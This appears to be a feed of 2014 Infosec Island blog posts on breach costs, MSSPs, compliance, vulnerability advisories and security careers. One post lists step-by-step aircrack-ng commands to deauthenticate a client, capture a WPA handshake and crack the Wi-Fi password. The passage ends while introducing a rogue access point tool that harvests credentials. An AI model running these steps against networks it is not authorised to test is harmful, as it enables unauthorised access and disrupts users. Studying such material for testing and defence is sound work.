Is There a Business Case in Planning for Data Breaches? Thu, 30 Oct 2014 10:13:30 -0500 By: Steven Ransom-Jones

When I was learning to fly, one of the many pearls of wisdom imparted to me by my instructor was that, as I transitioned from pre-flight planning (considering a myriad of “what-if” scenarios to prevent problems) to actually going aloft, I should mentally shift to continually considering what to do “when” an event, such as a failure, eventually takes place. The primary objective remained constant: to ensure a safe outcome with minimal consequences (you may call it applied risk management).

This shift in attitude appears to be apt for custodians of information systems, moving from planning services and incident prevention to operational preparedness in order to best ensure a successful outcome in the event of an unplanned incident. Sadly, even with sophisticated layers of defense, many organizations are facing similar thought processes of what to do “when” a data breach takes place rather than “if”.  Staples looks like it is the next addition to the list of notable incidents that includes Target, Home Depot, Chase, Goodwill, Michaels and P.F. Chang’s.

The recent Ponemon Institute benchmark research “2014 Cost of Data Breach Study: United States” identified a number of factors that could materially affect the impact and cost of managing a data breach. Apart from the headline average cost of an incident of $5.4 million, with a per-record figure rising to $201, there were some interesting observations relating to the root causes.

The involvement of a third party was one of the biggest contributors to the cost of managing a data breach, at 12.5% above the mean cost. There is ample indication that this is an extremely common situation that is developing rapidly with the adoption of outsourced computing and application services. As well as the HVAC vendor that was a vector for the Target breach, incidents at Lowe’s, Goodwill and AutoNation earlier this year were attributed to third-party vendors (E-DriverFile, C&K Systems and Trademotion respectively). Financial and healthcare regulators have identified third-party diligence as necessary. If we look at the potential for loss avoidance, effective vendor security management that includes incident management makes good sense as both a preventative and a response measure.

The maturity of the breach response plan represented another interesting opportunity to either increase or reduce the cost of a breach. Typically, organizations that made quick, less coordinated announcements and whose response activities did not follow a clear protocol experienced management costs 7% above the mean. On the other hand, those with a clear incident response plan reported average costs around 8.5% below the mean. The difference in response approach represents over $830,000 in a $5.4 million event. To return to the pilot analogy: preparedness training and the effective use of checklists have been proven to significantly improve outcomes.

This was cross-posted from the Neohapsis blog.

Copyright 2010 Respective Author at Infosec Island
On MSSP Personnel Thu, 30 Oct 2014 10:07:21 -0500

Unlike with an on-premise SIEM or even still-mostly-mythical SaaS/cloud SIEM, with an MSSP contract you are paying for people and not just for the tools. This obvious fact – that “S” in MSSP stands for “services” and service implies people – somehow escapes some organizations. Let’s explore this a bit here. If you pick an MSSP partner with an amazing technology platform and unskilled, frequently-churning, lazy, perversely-motivated (tickets closed per hour, anybody?) personnel with questionable ethics and lack of proficiency in your language of choice, do you think your security monitoring capability will…

  1. … succeed brilliantly
  2. … fail EPICally
  3. … would be no worse than now
  4. … can go whatever way.

I think you get an idea :-) Now, some of you may, in good faith, choose option 3). Frankly, I was thinking of coming up with some joke about it – but became sad instead …

A wise CSO once told me that in order to outsource a security process (such as security monitoring or device management) and achieve a great result, you have to know precisely what a great process of that kind looks like. Indeed, how would you know that your MSSP runs a great SOC, if you have never even seen one? The same applies to people. So, if you have never hired and managed great security analysts, how would you know that your MSSP partner actually employs them? Sure, when you buy products you can rely on our research, the views of your peers or whatever other factors, but such methods are much harder to apply to the people and process aspects of your future MSSP relationship. So, I am sorry to break the news here, but thinking is involved!

One quality MSSP provider told me that his favorite MSSP client is one that knows exactly what an excellent security operations capability looks like (such as from his previous job, etc.), but also knows that he cannot get one (no chance to hire, needs it faster than he can grow one, etc.). This makes perfect sense: it is easier to conceptualize and understand a mature security monitoring operation than to actually have one materialize in your organization. Thus, if you know what one looks like, you may be able to get that from your MSSP partner.

But back to people – in essence, you need to spend time learning:

a) what does a great security analyst look like?

b) whether your chosen MSSP partner has them?

c) whether they will be assigned to your account?

Otherwise, that MSSP may be cheap – rather than cost-effective. You want economies of scale in monitoring, not cheap crap in monitoring. And it is also your responsibility to understand the difference! So, learn about the security skill sets and relevant certifications, and then about whether the MSSP has them, and also whether their people have real experience fighting threats [and winning, at least occasionally :-)] and then continue checking whether that is still true as your relationship continues…

Finally, how was your experience with MSSP personnel?

This was cross-posted from the Gartner blog.

Compliance-Based Infosec Vs Threat-Based Infosec Wed, 29 Oct 2014 13:52:10 -0500

In the world of Information Security (infosec), there are two main philosophies: compliance-based infosec and threat-based infosec. Compliance-based infosec means meeting a set of written security standards designed to fulfill some goal such as the requirements of statute law or financial information privacy requirements. Threat-based infosec, on the other hand, means applying information security controls in reaction to (or anticipation of) threats that organizations currently (or soon will) face.

Compliance-based infosec is generally applied smoothly across the organization. In other words, all the security controls mandated in the security standard must be put in place by the organization, and the relative effectiveness of each control is largely ignored. In contrast, security controls are applied in a hierarchical manner in threat-based infosec. The most effective or greatly needed security controls are applied first according to the threats that are most likely to occur or that will cause the most damage to the organization if they do occur. 

The difference is sort of like the defensive strategy of the Chinese versus that of the Normans in post-conquest England. The Chinese built very long walls that went from one end of their territory to the other. Their goal was to keep out all invaders everywhere. This is a grand idea, but takes a very large amount of resources to implement and maintain. In practice, it takes tons of men and infrastructure and the defensive capabilities at any one place are spread thin. The Normans in England, on the other hand, built strong castles with many layers of defense in strategic locations where the threats were greatest and where it was easiest to support neighboring castles. In practice, there are fewer defenses at any one point, but the places where defenses are implemented are very strong indeed. Both of these strategies have merit, and are really driven by the particular set of circumstances faced by the defender. But which is better for your organization? Let’s look at compliance-based infosec first.

Compliance-based infosec, when implemented correctly, is really the best kind of defense there is. The problem is, the only place I’ve ever seen it really done right is in the military. In military information security, failure to protect private information can lead to death and disaster. Because of this, no expense or inconvenience is spared when protecting this information. Everything is compartmentalized and access is strictly based on need to know. Every system and connection is monitored, and there are people watching your every move. There are rules and checklists for everything, and failure to comply is severely punished. In addition, better ways to protect information are actively sought, and those who come up with valuable ideas are generously rewarded.

This is not the way compliance-based infosec works in the private sector, or even in non-military government agencies. First, statute law is tremendously vague when discussing implementing information security. Laws make broad statements such as “personal health information will be protected from unauthorized access or modification”. Fine. So a group of people get together and write up a body of regulations to further spell out the requirements organizations need to meet to comply with the law. Unfortunately, you are still dealing with pretty broad brush strokes here. To try to get a handle on things, agencies and auditors rely on information security standards and guidelines such as those documented by NIST or ISO. From these, baseline standards and requirements are set down.

The problems here are many. First, baseline standards are minimums. They are not saying “it’s best if you do this”, they are saying “you will at least do this”. However, typical organizations, (which generally have very limited infosec budgets), take these baseline standards as goals to be strived for, not starting points. They very rarely meet baseline standards, let alone exceed them. Also, NIST and ISO standards are not very timely. The standards are only updated occasionally, and they are not very useful for countering new and rapidly developing threats. So, unless your organization is really serious about information security and has the money and manpower to make it work, I would say compliance-based infosec is not for you. I know that many organizations (such as health care and financial institutions) are required to meet baseline standards, but remember what happened to Target last year. They were found to be compliant with the PCI DSS, but still had tens of millions of financial records compromised.

Now let’s look at threat-based infosec. To implement a threat-based information security program, the organization first looks at the information assets they need to protect, the threats and vulnerabilities that menace them and the consequences that will ensue if those information assets are actually compromised (basic asset inventory and risk assessment). They then prioritize the risks they face and decide how to implement security controls in the most effective and efficient way to counter those particular risks. That might mean implementing strong egress filtering and log monitoring as opposed to buying the fanciest firewall. Or it might mean doing something simple like ensuring that system admins use separate access credentials for simple network access and administrative access to the system. Whatever controls are applied, they are chosen to solve particular problems, not to meet some broad baseline that is designed to meet generally defined problems. Also, threat-based infosec programs are much better at anticipating and preparing for emerging threats, since reassessments of the security program are made whenever there are significant changes in the system or threat picture.

These are the reasons that I think most of us in non-military organizations should go with threat-based infosec programs. Even those organizations that must meet regulatory requirements can ensure that they are spending the bulk of their infosec money and effort on the effective controls, and are minimizing efforts spent on those controls that don’t directly counter real-world threats. After all, the laws and regulations themselves are pretty vague. What counts in the long run is real information security, not blind compliance with inadequate and antiquated baselines. 

Thanks to John Davis for this post.

This was cross-posted from the MSI State of Security blog.

Cracking Wifi Passwords With Kali Linux Wed, 29 Oct 2014 12:42:00 -0500

I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at

The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.

In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.

1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode; mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to)
5. airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake, so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w [path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.

Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.

Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper: what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker perspective – and also how can you use this knowledge to build better defences?

This was cross-posted from the J4VV4D blog.

Healthcare Data Today: In Motion or Out of Control? Tue, 28 Oct 2014 12:26:16 -0500

From October 2009 through the present day, one industry alone has reported 900 different breaches. And none of those 900 were limited in their scope – in each, at least 500 individuals were affected. Who knows how many other smaller breaches happened, without public knowledge.

The industry we’re describing probably isn’t any of the ones you might guess – maybe retail or financial services – it’s the healthcare industry. And we can be absolutely certain that the numbers really are this high because the healthcare providers are required by law to disclose any breach affecting 500 or more individuals.

Since the HITECH Act of 2009, the U.S. has been grappling with how best to adopt new technology like electronic health records and telemedicine tools. The challenge is always to walk the line between improving patient care, without jeopardizing patient privacy.

For that reason, the Department of Health and Human Services is now responsible for reporting breaches to the public. It doesn’t matter whether the breach is the result of negligence involving an inadequate remote access policy or the theft of a laptop – all major incidents are reported. Healthcare information is particularly valuable to attackers because it can lead to even more lucrative data, such as bank account information or prescriptions that can be used to obtain controlled substances.

Yet, these incidents involving healthcare providers aren’t the ones making national headlines. Usually, widespread public panic involving network security is reserved for high-profile breaches of retailers and financial providers instead.

The silver lining is that every time another Target or Home Depot is attacked, retailers are again reminded that they could be next in the crosshairs. Their response is to reinforce their defenses. And as we know, hackers are persistent, but they’re still governed by human nature. They will aim for the path of least resistance – there’s little reason for them to try, and potentially fail, to attack an on-notice retailer, if an unaware, vulnerable healthcare provider is also in the picture.

That’s why the FBI put healthcare providers on notice back in April, with a warning that they could be especially vulnerable to cyberattacks. The FBI said that the healthcare industry is not as “resilient” to cyberattacks, despite how much damage they could cause.

That’s in part why three government agencies – the U.S. Food and Drug Administration, and the Departments of Health and Human Services and Homeland Security – hosted a public workshop on October 21-22 to “catalyze collaboration,” as a means to improve medical device cybersecurity.

That information session helped bring these issues to the forefront, but ultimately, when it comes to healthcare network security and keeping “data in motion” safe, the responsibility rests primarily with individual providers.

Healthy Patients, Healthy Network Security

One such provider is American Hospice, which calls a secure communications environment a “cornerstone” of its mission to care for patients. For a national care provider like American Hospice, whose 180 home healthcare workers treat more than 1,500 patients, secure remote access is essential.

American Hospice employees need to be able to safely and quickly update files while on the road. It’s not just about meeting HIPAA requirements involving privacy – it’s about improving worker productivity (by removing manual, paper-based processes), reducing operating costs and protecting sensitive patient information, as well as its own IT system integrity.

In May 2010, American Hospice turned to a Secure Enterprise VPN solution and gained all of these benefits. Workers are now able to safely and remotely access the network through secure mobile devices, allowing them to keep the main office updated, in near real-time.

The goal of all healthcare providers ought to be safer care for patients and peace of mind for their families, and thanks to its secure remote access capabilities, American Hospice has finally reached that point.

This was cross-posted from the VPN Haus blog.

On MSSP SLAs Tue, 28 Oct 2014 11:19:12 -0500

Is 15 minutes a mere instant or an eternity? Is getting an alert 15 minutes after it was first generated fast enough? And the opposite question: is 15 minutes of MSSP-side alert triage enough to make sure that the alert is relevant, high-priority and high-fidelity?

Indeed, spending too little time leads to poor quality alerts, but spending too much time on quality alerts leads to the attacker achieving their goals before the alert arrives and is acted upon.

So, yes, I did speak with one MSSP client who said that “15 minutes is too late for us” and another who said that “an MSSP cannot do a good job qualifying an alert in a mere 15 minutes” (both quotes fictional, but both “inspired by a real story”).

The answer to this – frankly not overly puzzling – question is again security operations maturity. On one end of the spectrum we have folks who just “don’t do detection” and rely on luck, law enforcement and unrelated third parties for detection (see this for reference). On the other, we have those with ever-vigilant analysts, solid threat intel and hunting activities for discovering the attackers’ traces before the alerts even come in.

As we learned before, the security chasm is very strong in this area.

Therefore, a meaningful MSSP SLA discussion cannot happen without the context of your state of security operations.

For example, if you …

  1. … have no operation to speak of and plan to hire an intern to delete alerts? You can accept any alert SLA, [SAVE MONEY!!! GET YOUR ALERTS BY SNAIL MAIL! CARRIER PIGEON OK TOO! :-)] whether it is at the end of the day, or even a week. If you have no plan to ever act on a signal, a discussion of the timing of action is senseless.
  2. … can act on alerts when really needed, and will probably scramble a response if something significant happens? Look for a few hours or similar timing, and limit alerts to truly critical, “incident-ready” ones.
  3. … have a defined security monitoring/response function that is equipped to handle alerts fast? Aim at up to an hour for significant alerts and others maybe at the end of the day.
  4. … possess a cutting-edge security response operation? Push your MSSP partner to 15 minutes or less – for the best chance to stop the attacker in his tracks. Set up a process to review and process alerts as they come, and refine the rules on the fly. Respond, rinse, repeat, WIN!

The key message is: you don’t want to pay for speed that you won’t be able [or don’t plan] to benefit from. If security alerts will sit in inboxes for hours, you don’t need them delivered in minutes.

Now, what about the SLAs for various management services, such as changing NIDS rules and managing firewalls? SLAs play a role here as well, and – you guessed it – what you need here also depends on the maturity of your change management processes… Some people complain that an MSSP is too slow with updates to their security devices, while others know that MSSP does it faster than they can ever do it.

This was cross-posted from the Gartner blog.

Distinguishing Acts of War in Cyberspace Mon, 27 Oct 2014 11:36:03 -0500

Determining an act of war in the traditional domains of land, sea, and air often involves sophisticated interactions of many factors that may be outside the control of the parties involved. This monograph seeks to provide senior policymakers, decisionmakers, military leaders, and their respective staffs with essential background on this topic as well as introduce an analytical framework for them to utilize according to their needs.

It develops this theme in four major sections:

1. it presents the characterization of cyberspace to establish terms for broader dialogue as well as to identify unique technical challenges that the cyberspace domain may introduce into the process of distinguishing acts of war. 

2. it explores assessment criteria involved with assaying cyber incidents to determine if they represent aggression and possible use of force; and if so, to what degree? 

3. it looks at the policy considerations associated with applying such criteria by examining relevant U.S. strategies as well as the strategies of other key countries and international organizations, and considers how nonstate actors may affect U.S. deliberations. 

4. it examines the influences that course of action development and implementation may have on the assessment of cyberspace incidents, such as reliable situational awareness, global and domestic environment considerations, and options and their related risks and potential consequences. It argues that the United States must also expect and accept that other nations may reasonably apply the criteria we develop to our own actions in cyberspace.

In conclusion, this monograph examines the question of what constitutes an act of war, or aggression, in the cyberspace domain. The author also provides a set of recommendations to US policymakers to help them better understand and mitigate the fog and friction surrounding the distinction of acts of war in cyberspace.

Download the monograph here:  

This was cross-posted from here.

NIST warns on Zero-Day flaw in Samsung FindMyMobile Mon, 27 Oct 2014 11:32:05 -0500

The National Institute of Standards and Technology is warning of the presence of a Zero-Day flaw in the Samsung FindMyMobile service.

US-CERT/NIST is warning of the presence of a zero-day flaw that affects the Samsung FindMyMobile web service (CVE-2014-8346). Samsung FindMyMobile implements several features that allow users to locate a lost device, to play an alert on a remote device or to remotely lock the mobile phone.

“The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic,” states the security advisory issued by NIST.

According to NIST, the Remote Controls feature implemented by Samsung FindMyMobile fails to validate the sender of lock-code data received over a network; as a result, an attacker could remotely cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.

NIST rated the severity of the flaw in Samsung FindMyMobile as HIGH, and the exploitability subscore is 10.0, an index of the likelihood of exploitation.

Below are a couple of video POCs:

More information is available in the CVE Standard Vulnerability Entry for the CVE-2014-8346 flaw.

This was cross-posted from the Security Affairs blog.

Webcast: How Gaps In SSH Security Create an Open Door for Attackers Mon, 27 Oct 2014 08:17:49 -0500

Please join us on Thursday, Oct. 30th at 1PM ET for a special webcast: Gaps In SSH Security Create an Open Door for Attackers, presented by Venafi.

Almost half of IT security professionals reported they experienced compromised or misused Secure Shell (SSH) keys in the last 24 months. The majority of the survey respondents rely on overburdened system administrators to self-govern their SSH keys. Unfortunately the result is ineffective security practices that leave the organization exposed.

Forrester Research analyst John Kindervag emphasizes, “Two-thirds of IT security professionals do not perform the necessary checks for unauthorized use of SSH keys.”

Forrester research exposes the state of SSH in most organizations. In this webinar, you will be provided with recommendations on how to mitigate the vulnerabilities that allow SSH keys to be exploited and the gaps within an organization that leave SSH keys vulnerable to these attacks.

• Review the Forrester Research findings on the state of SSH in the enterprise network

• Learn what strategies need to be implemented to mitigate trust-based attacks

• Understand the risks of not mitigating trust-based attacks

PRESENTER: Gavin Hill – Director of Product Marketing & Threat Intelligence


With over 15 years of experience in product development and product marketing in the cyber security space, Gavin Hill is particularly adept at identifying where enterprises are at risk and developing products that mitigate the risks related to evolving cyber threats. At Venafi he is responsible for threat intelligence, focusing on Next-Generation Trust Protection, and for product marketing. Before working at Venafi, Gavin held a variety of leadership positions at Bitdefender and Trend Micro, where he identified risks associated with data storage and workloads in the cloud. Under his direction, Bitdefender released a first-to-market AV-as-a-service offering, and Trend Micro developed another first-to-market product to encrypt data in the cloud while storing the encryption keys separately from the cloud provider.

Cyber Security Careers: What You Need To Know To Advance In The Security Field Thu, 23 Oct 2014 14:32:00 -0500 By: David Bisson

National Cyber Security Awareness Month (NCSAM) has entered its fourth week, introducing the topic of cyber security for small and medium-sized businesses and entrepreneurs.

SMBs are extremely vulnerable to cybercrime. Small businesses have embraced online transactions, but with limited budgets, many lack the resources to afford effective security measures, let alone the millions of dollars they would need to respond to a data breach.

Today, however, the need for businesses to invest in cyber security is essential for all companies. Large enterprises might be able to afford strong cyber protection but their massive customer base still makes them very lucrative targets. As we’ve seen with the recent network intrusions at JPMorgan Chase, Home Depot and Target, big corporations are not impossible to crack.

Ultimately, all businesses are in the same boat, but as we all know, technology only goes so far. Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that public and private sectors begin training and hiring cyber security professionals.

Are you considering a career in cyber security? Here is what various industry professionals had to share about how to find your place in the field, make the most out of your profession and help protect companies’ sensitive information

A Wide Career Path

Chris Conacher, Manager of Security and Compliance Solutions at Tripwire, knows the layout of the cyber security field quite well, including how far the industry has come.

“When I started out, there were no certifications or related education and only the government and its contractors had specific security roles,” said Conacher. “Nowadays, there is a whole career path from entry-level all the way up to executive-level, which is great.”

Professionals in the field have a variety of career options and specializations available to them. “You can be in operations, systems engineering, development, architecture, or testing and there is an established third-party service model, so it’s easy to create your own company and get work,” said Conacher.

In addition to the diversity of professions, careers in cyber security also range across numerous industry sectors. “If you want to be left alone in a dark room developing tools or finding exploits, there are people who will pay for that,” said Jason Waterman, who leads the Cyber, Information and IT Security Practice at Badenoch & Clark. “And if you want to be out as an evangelist, meeting people and speaking at conferences, there are people who will pay for that, as well.”

Just remember that each path usually comes with its own certification requirements. General credentials, such as CompTIA Security+ or the Certified Information Systems Security Professional (CISSP), are likely to apply but vendor-specific certifications may also be required. Simon Hember, MD and Owner of Acumin Consulting, adds, “Like with many professions, gaining relevant qualifications, such as a CISSP or CISM, is as important as gaining ‘hands on’ experience to build a solid foundation.”

Cyber Security is Indispensable to Businesses

The danger of being breached is an ever-present concern, so as companies continue to integrate with the global economy and expand, more and more will recognize the necessity of implementing strong cyber security measures. This means that cyber security careers will multiply. In fact, Forbes reported last summer that the field is expected to grow tenfold in the next decade.

“Not only will professionals be at a premium and therefore, be rewarded accordingly but they will also be at the cutting edge of business and technology decisions across all industries,” adds Waterman. “No company, no matter the size or industry, is immune to a cyber breach and every business must be prepared.”

Curiosity and Communication as Critical Skills

Cyber security professionals will succeed in the field if they have two traits: inquisitiveness and an ability to communicate with others.

Problem-solving is at the heart of cyber security, so experts in the field need to have a willingness to dig deep into vulnerabilities and develop creative solutions, says Conacher: “I got into security because I enjoyed puzzles, taking things apart and understanding how things work. If you can combine this inquisitiveness with a level of discipline around how you approach problems and implement solutions, you will do well.”

Another important trait is the ability to communicate with others, especially since many people in the industry don’t speak the highly technical language. Therefore, it’s imperative that cyber security professionals can explain the value of their security efforts and how it benefits the overall business.

“The ability to effectively convey your message to peers of all levels will be increasingly important as many employees still are not aware of simple steps to help avoid breaches,” explains Waterman. “Often candidates and clients I deal with stress the importance of this skill set, which will have a direct impact on how far you can take your career.”

Other skills, including an ability to analyze data and experience in project management, are also useful depending on the nature of the work involved.

A Bright Future Ahead

Reflecting the diverse cyber threats in existence today, the field of cyber security is full of opportunities. If that weren’t enough, there are a number of changes that may happen in the near future. As Waterman predicts, “Over the next five years, I can see more C-Level positions being created for cyber professionals and the role of the CISO developing into an ever-increasing board room role.”

“My hope is that a more visible CISO and security policy will increase the interest in this subject… [which] will create more opportunities at an industry level for companies to build strong and skilled cyber aware work forces.”

Meanwhile, Hember sees an imminent growth in the number of cyber security start-ups: “We’re also seeing a lot of significant funding rounds in the vendor community, so opportunities to get involved in exciting—and often disruptive—start-up companies in both technical and commercial roles can also offer an exciting career path.”

Given the versatility, indispensability to business and promises for the future, cyber security is whatever professionals decide to do with it. As Conacher notes, “security is the one career where the sky is the limit; professionals are limited only by their ambition and their imagination.”

That is fortunate to hear. To face all the cyber threats confronting us today, we need all the help we can get.

This was cross-posted from the State of Security blog.

Copyright 2010 Respective Author at Infosec Island
Cyber-Criminals Quickly Adopt Critical Flash Player Vulnerability
Thu, 23 Oct 2014 11:30:08 -0500

Keeping your computer up-to-date is probably one of the best pieces of advice one can give when it comes to online security.

Perhaps it should also be emphasized that patches ought to be applied in a timely fashion.

Case in point, less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569) was patched and made public:


The vulnerability had been privately reported to Adobe through the Zero Day Initiative group giving the firm the time to fix the issue before it became known to the world.

Typically, security researchers and criminals alike are very attentive to such news, and skilled reverse engineers start looking at the patch in order to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released, and then a little more time before that PoC is weaponized by the bad guys.

You can imagine how surprised Kafeine was when he stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one week after the official security bulletin had been published!

Although this is not a zero day, one can imagine that there was a strong and urgent interest in exploiting this vulnerability in the wild.

That means we have less and less time to deploy and test security patches. Perhaps this is not a big deal for individuals, but it can be much harder for businesses, which need to roll out patches on dozens of machines while hoping that doing so will not cause malfunctions in existing applications.

In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:


The server sends down the exploit landing page, quickly followed by the new Flash exploit, which is successfully blocked by Anti-Exploit.

We also observed another Flash exploit (we are not sure yet which CVE is targeted, only that it was also patched a week ago) in the Angler EK:


It is crucial to patch any system running outdated Flash Player versions as soon as possible!

You can check the version you are running (make sure to do this in all the browsers you use) by going here.

To download the latest version click here (don’t forget to uncheck the pre-selected options to download toolbars or other Potentially Unwanted Programs AKA PUPs):


Browsing the Net on an unpatched computer is like playing Russian roulette with a handful of loaded guns: “do you feel lucky?”


The first payload you get hit with is the infamous fileless malware also known as Bedep, which enrolls you in a botnet:


Malwarebytes Anti-Malware detects the initial payload as Trojan.FakeMS.ED.

As they say, the rest is history, with more malware being downloaded and yet another machine ready to send out spam once it has been pickpocketed.

The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches sooner rather than later.

Many thanks go to Kafeine for providing additional data on CVE-2014-0569. Feel free to read his original post here.

This was cross-posted from the Malwarebytes blog.

New Zero-day in Microsoft OLE Being Exploited in Targeted Attacks
Wed, 22 Oct 2014 13:28:25 -0500

Security experts at Google and McAfee have discovered a new zero-day vulnerability in Microsoft OLE being exploited in targeted attacks.

Early this week, Microsoft issued security advisory 3010060 to warn its customers of a new zero-day vulnerability that affects all supported versions of Windows except Windows Server 2003.

The OLE Packager is the component affected by the zero-day, which was discovered by researchers at McAfee and Google. Curiously, the component was patched only this month, in MS14-060; in response to this latest flaw, Microsoft has released a Fix It package for PowerPoint and encouraged the use of EMET 5.0.

The most concerning thing related to the Microsoft zero-day flaw is that it is already being exploited by threat actors in targeted attacks.

“The vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file that contains an OLE object. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user,” the advisory explained. “At this time, we are aware of limited, targeted attacks that attempt to exploit the vulnerability through Microsoft PowerPoint,” it added, confirming reports that bad actors are already exploiting the zero-day in limited cases.

OLE (Object Linking and Embedding) is a proprietary technology developed by Microsoft that allows embedding and linking to documents and other objects. As explained by the experts at Microsoft, the vulnerability in Microsoft OLE, tracked as CVE-2014-6352, could allow remote code execution if a user opens a specially crafted Microsoft Office file that contains an OLE object.

The file could be sent via email to the victims in a classic spear-phishing attack or the attacker could serve it through a compromised website in a classic watering hole attack.

The security advisory lists the following mitigating factors:

  • In observed attacks, User Account Control (UAC) displays a consent prompt or an elevation prompt, depending on the privileges of the current user, before a file containing the exploit is executed. UAC is enabled by default on Windows Vista and newer releases of Microsoft Windows.
  • An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
  • In a web-based attack scenario, an attacker could host a website that contains a webpage that contains a specially crafted Office file that is used to attempt to exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker’s website.
  • Files from the Internet and from other potentially unsafe locations can contain viruses, worms, or other kinds of malware that can harm your computer. To help protect your computer, files from these potentially unsafe locations are opened in Protected View. By using Protected View, you can read a file and see its contents while reducing the risks. Protected View is enabled by default.

The principal problem is that, although exploitation of the flaw triggers a warning, users often ignore it. The issue is particularly serious in corporate environments, where executives and remote users are often granted administrative rights on their systems.

This was cross-posted from the Security Affairs blog.

6 Actions Businesses Should Take During Cyber Security Awareness Month
Wed, 22 Oct 2014 11:24:04 -0500

October is National Cyber Security Awareness Month. It would seem the breaches announced virtually every day of this month so far were orchestrated to highlight the need for organizations to beef up their information security efforts and improve their controls.

Sadly, instead, cyber incidents seem to have become de rigueur these days. Consumers are getting fed up, and government agencies are proposing more laws. The tide is turning, and soon organizations will be held accountable for more effectively protecting their systems and information, or they will likely face much steeper fines and penalties than ever before. So, now’s the time to take action! Here are six actions you can take this month to start improving your organization’s information security program and associated efforts.

1. Review your authentication methods.

When was the last time you updated the way your legacy and older systems and applications authenticate user accounts? Do you still use just a password, one that isn’t even required to be strong? Do you engineer new systems and applications using these same weak methods? Now is the time to improve your authentication methods.

TO DO: Implement two-step authentication wherever possible and require strong passwords.

2. Apply security updates to all your systems and applications.

Are you up-to-date with all your security patches and systems updates? Cyber crooks look for systems that have old vulnerabilities. Plus, those vulnerabilities can allow bad things to happen as a result of mistakes and interactions with other applications and systems. You are a digital sitting duck if you don’t stay on top of security updates. Case in point: Have you updated your OpenSSL to remove the Heartbleed vulnerability? Do it now!

TO DO: Update your systems to the most recent version and apply all appropriate security patches available.

3. Give your personnel training and awareness communications.

People are not born with an innate sense of how to secure information. Your information security and privacy policies, and the related work-activity information they need, are not transmitted to them through osmosis. Too bad the majority of business leaders seem not to realize this, given the appalling lack of good information security and privacy training, and awareness communications, within organizations. You must provide effective training as well as ongoing awareness communications so personnel know how to incorporate effective information protection practices into their daily job activities. Just consider this: one recent study found that 57% of privacy breaches are caused by insiders, most of whom simply made mistakes or did things without knowing that it would put information at risk. These could have been prevented with good education.

TO DO: Give good and effective information security and privacy training to ALL your employees, and send them ongoing reminders and other types of awareness communications.

4. Do a security and privacy audit.

Do you just assume that all your privacy and security controls are enough and working just fine? Do you assume that all security and privacy risks have been appropriately mitigated? If your answer is yes, is this because you have confidence following a recent (as in within the past few months) risk assessment? If you’re making these assumptions based upon old risk assessments, or through blind trust in the absence of risk assessments, then you are putting your organization at great risk of becoming the next cybersecurity breach incident in the headlines. You need to do risk assessments regularly. The more time that has passed since a risk assessment, the more the business has changed, potentially creating new risks.

TO DO: Do regular information security and privacy risk assessments and mitigate the discovered risks appropriately.

5. Make your security and privacy practices transparent.

Do you have a privacy notice and information security policy posted on your website? Does it accurately reflect the current practices of your organization? Do your employees know what they say? Do their work activities support what the statements and policies say?

TO DO: Create a clear, accurate and easy to understand web site privacy practices statement and information security policy. Keep them updated to reflect changes in your organization’s practices.

6. Find out what your contracted third parties are doing.

When you entrust contracted third parties with access to your data, and all forms of information, and the associated systems and physical locations, you retain a level of responsibility for the actions of those third parties. Do they have an effective information security and privacy program in place? You need to vet your third parties and maintain a level of oversight over their security and privacy practices. If they have a privacy breach or security incident, you will ultimately be held responsible in some manner.

TO DO: Ask your third parties to provide you with the results of a recent risk assessment; a high-level one is enough to get something started and to get quick results if they don’t have a recent risk assessment report available. Then establish ongoing oversight of your third parties’ information security and privacy practices.

Bottom line for organizations of all sizes…

These six actions are just the start of improving, or building, your information security and privacy program into one that is effective, comprehensive and up-to-date. And certainly every organization, of every size, in every location, in every industry, needs to have an effective, comprehensive information security and privacy program in place. Doing the six actions listed above will help you to see where you need to make improvements. Every month should really be Cyber Security Awareness Month for all organizations.

This was cross-posted from the Privacy Professor blog.

Mana Tutorial: The Intelligent Rogue Wi-Fi Router
Tue, 21 Oct 2014 11:59:41 -0500

“Mana,” by Dominic White (singe) & Ian de Villiers at Sensepost, is an amazing full-featured evil access point that does, well, just about everything. Just install and run it and you will in essence receive Wi-Fi credentials or “Mana” from heaven!

Here is a link to the creator’s Defcon 22 presentation:

Not sure where to start with this one. Like other rogue Wi-Fi AP programs Mana creates a rogue AP device, but Mana does so much more.

